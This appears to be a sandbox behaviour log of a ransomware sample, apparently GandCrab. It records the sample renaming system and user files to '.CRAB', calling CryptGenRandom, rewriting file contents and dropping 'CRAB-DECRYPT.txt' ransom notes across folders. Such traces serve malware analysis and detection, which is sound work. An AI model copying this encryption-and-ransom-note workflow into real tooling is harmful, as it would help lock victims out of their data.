File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2216 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp.CRAB, size = 2224 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 880 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp.CRAB, size = 880 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\Syscache.hve, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\Syscache.hve, destination_filename = C:\System Volume Information\Syscache.hve.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\Syscache.hve.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\Syscache.hve.CRAB, size = 1048576, size_out = 262144 True 1
Fn
File Write filename = C:\System Volume Information\Syscache.hve.CRAB, size = 262144 True 1
Fn
File Write filename = C:\System Volume Information\Syscache.hve.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\Syscache.hve.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\Syscache.hve.LOG1, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\Syscache.hve.LOG1, destination_filename = C:\System Volume Information\Syscache.hve.LOG1.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\Syscache.hve.LOG1.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\Syscache.hve.LOG1.CRAB, size = 1048576, size_out = 41984 True 1
Fn
File Write filename = C:\System Volume Information\Syscache.hve.LOG1.CRAB, size = 41984 True 1
Fn
File Write filename = C:\System Volume Information\Syscache.hve.LOG1.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\Syscache.hve.LOG1.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\tracking.log, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\tracking.log, destination_filename = C:\System Volume Information\tracking.log.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\System Volume Information\tracking.log.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\tracking.log.CRAB, size = 1048576, size_out = 20480 True 1
Fn
File Write filename = C:\System Volume Information\tracking.log.CRAB, size = 20480 True 1
Fn
File Write filename = C:\System Volume Information\tracking.log.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\tracking.log.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\{086bd6b5-6870-11e7-8470-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{086bd6b5-6870-11e7-8470-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{086bd6b5-6870-11e7-8470-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{086bd6b9-6870-11e7-8470-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{086bd6b9-6870-11e7-8470-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{086bd6b9-6870-11e7-8470-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{5369f26b-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{5369f26b-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{5369f26b-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{5369f271-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{5369f271-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{5369f271-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{5369f275-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{5369f275-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{5369f275-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{5369f279-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{5369f279-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{5369f279-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{5369f27d-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{5369f27d-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{5369f27d-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{5369f282-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{5369f282-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{5369f282-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{5369f286-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{5369f286-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{5369f286-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{5369f294-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{5369f294-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{5369f294-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{6af7a98d-5d7d-11e7-9bb9-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{6af7a98d-5d7d-11e7-9bb9-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{6af7a98d-5d7d-11e7-9bb9-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{7d6ee35a-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{7d6ee35a-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{7d6ee35a-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{7d6ee485-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{7d6ee485-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{7d6ee485-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{7d6ee7d2-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{7d6ee7d2-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{7d6ee7d2-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{7d6ee7d6-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{7d6ee7d6-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{7d6ee7d6-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{7d6ee7da-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{7d6ee7da-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{7d6ee7da-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{b3b06227-5d7f-11e7-8a02-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{b3b06227-5d7f-11e7-8a02-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{b3b06227-5d7f-11e7-8a02-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{da689ac8-5d73-11e7-8702-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{da689ac8-5d73-11e7-8702-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{da689ac8-5d73-11e7-8702-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{f838e7a7-6707-11e7-a8fc-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{f838e7a7-6707-11e7-a8fc-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{f838e7a7-6707-11e7-a8fc-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Get Info filename = C:\System Volume Information\{f838e7ab-6707-11e7-a8fc-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
Fn
File Move source_filename = C:\System Volume Information\{f838e7ab-6707-11e7-a8fc-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{f838e7ab-6707-11e7-a8fc-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
Fn
File Create filename = C:\Users\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\3I-LDvLH0.ppt, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\3I-LDvLH0.ppt, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\3I-LDvLH0.ppt.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\3I-LDvLH0.ppt.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\3I-LDvLH0.ppt.CRAB, size = 1048576, size_out = 73307 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\3I-LDvLH0.ppt.CRAB, size = 73312 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\3I-LDvLH0.ppt.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\3I-LDvLH0.ppt.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\4eWpORekA.mp3, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\4eWpORekA.mp3, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\4eWpORekA.mp3.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\4eWpORekA.mp3.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\4eWpORekA.mp3.CRAB, size = 1048576, size_out = 17071 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\4eWpORekA.mp3.CRAB, size = 17072 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\4eWpORekA.mp3.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\4eWpORekA.mp3.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Collab\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Collab\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Forms\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Forms\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js.CRAB, size = 1048576, size_out = 10 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js.CRAB, size = 16 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata.CRAB, size = 1048576, size_out = 5399 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata.CRAB, size = 5408 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.CRAB, size = 1048576, size_out = 933 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.CRAB, size = 944 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.CRAB, size = 256 True 2
Fn
